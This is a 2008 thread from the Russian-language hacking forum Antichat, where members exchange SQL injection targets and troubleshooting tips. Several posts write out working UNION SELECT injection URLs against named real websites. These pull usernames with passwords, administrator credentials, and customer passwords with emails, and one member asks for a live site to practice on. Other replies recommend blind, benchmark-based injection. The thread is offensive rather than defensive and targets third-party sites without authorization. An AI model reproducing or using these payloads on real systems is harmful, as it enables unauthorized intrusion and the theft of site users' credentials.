ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

12.07.2008, 12:43
|
|
Новичок
Регистрация: 20.06.2008
Сообщений: 8
Провел на форуме: 138846
Репутация:
21
|
|
Сообщение от DDoSька
http://www.oke.ru/xo4u.php?id=-42708
http://www.globaleconomicgovernance.org/research.php?id=-2
http://www.oke.ru/xo4u.php?id=-1+union+select+1,2,null,4,concat(nick,0x3a,passw), 6,7,8,9,10+from+chausers/*
http://www.oke.ru/xo4u.php?id=-1+union+select+1,2,TABLE_NAME,4,TABLE_NAME,6,7,8,9 ,10+from+INFORMATION_SCHEMA.TABLES+limit+30,100/*
http://www.oke.ru/xo4u.php?id=-1+union+select+1,2,3,4,COLUMN_NAME,6,7,8,9,10+from +INFORMATION_SCHEMA.COLUMNS+limit+205,200/*
|
|
|

13.07.2008, 12:23
|
|
Новичок
Регистрация: 23.06.2008
Сообщений: 27
Провел на форуме: 260423
Репутация:
15
|
|
Сообщение от Sandjuro
Подкиньте скулю, я попрактикуюсь
На _http://live.cnews.ru/forum/index.php?showtopic=24419&st=1260
на сколько я знаю довольно серьезный ресурс=)) 
|
|
|

13.07.2008, 21:00
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме: 2584838
Репутация:
770
|
|
http://comline.ru/index.php?pageid=34697+order+by+5-- нормально обрабатывает.
http://comline.ru/index.php?pageid=34697+union+select+1,2,3,4,5-- ошибка.
в чем трабл?
|
|
|

16.07.2008, 10:42
|
|
Познающий
Регистрация: 24.01.2008
Сообщений: 41
Провел на форуме: 117464
Репутация:
6
|
|
народ помогите при вводе ограниченного количества параметров(т.е. вместо index.php?a=1&b=1 я ввожу только index.php?a=1) сайта (назовем его test.ru)
выдается следующее сообщение.
DEBUG INFORMATION:
Invalid query: Can't find FULLTEXT index matching the column list
SELECT * FROM fedyp_mod_catalog_params WHERE (MATCH (cat_id) AGAINST ('[all]') OR MATCH (cat_id) AGAINST ('[5]')) AND (`site_cat_id` LIKE '%[63]%' OR `site_cat_id` LIKE '%[all]%') ORDER BY `order_id`,`id`
что можно тут сделать?
|
|
|

16.07.2008, 17:16
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме: 3887520
Репутация:
2996
|
|
провести скуль можно...
|
|
|

20.07.2008, 13:21
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме: 964766
Репутация:
228
|
|
Подскажите плиз, есть сайт с иньекцией:
Код:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
также:
Код:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--
Проблема в том, что при попытке ввода любого корректно-составленного запроса показывается пустое окно, а при ошибочном запросе ошибка синтаксиса MySQL.
Подскажите что можно попробовать в этом случае?
|
|
|

20.07.2008, 13:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
blind техники с использованием benchmark
|
|
|

20.07.2008, 14:25
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме: 964766
Репутация:
228
|
|
Сообщение от geezer.code
blind техники с использованием benchmark
еще бы эксплойт найти рабочий 
|
|
|

02.08.2008, 21:09
|
|
Новичок
Регистрация: 30.07.2008
Сообщений: 18
Провел на форуме: 268783
Репутация:
0
|
|
http://www.demo.aloneislands.ru помогите найти и залатать дырки
за спасибку
|
|
|

05.08.2008, 21:04
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме: 584540
Репутация:
96
|
|
Сообщение от Calcutta
http://comline.ru/index.php?pageid=34697+order+by+5-- нормально обрабатывает.
http://comline.ru/index.php?pageid=34697+union+select+1,2,3,4,5-- ошибка.
в чем трабл?
подзапросы,недавно обсуждалось в разделе про уязвимости...
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|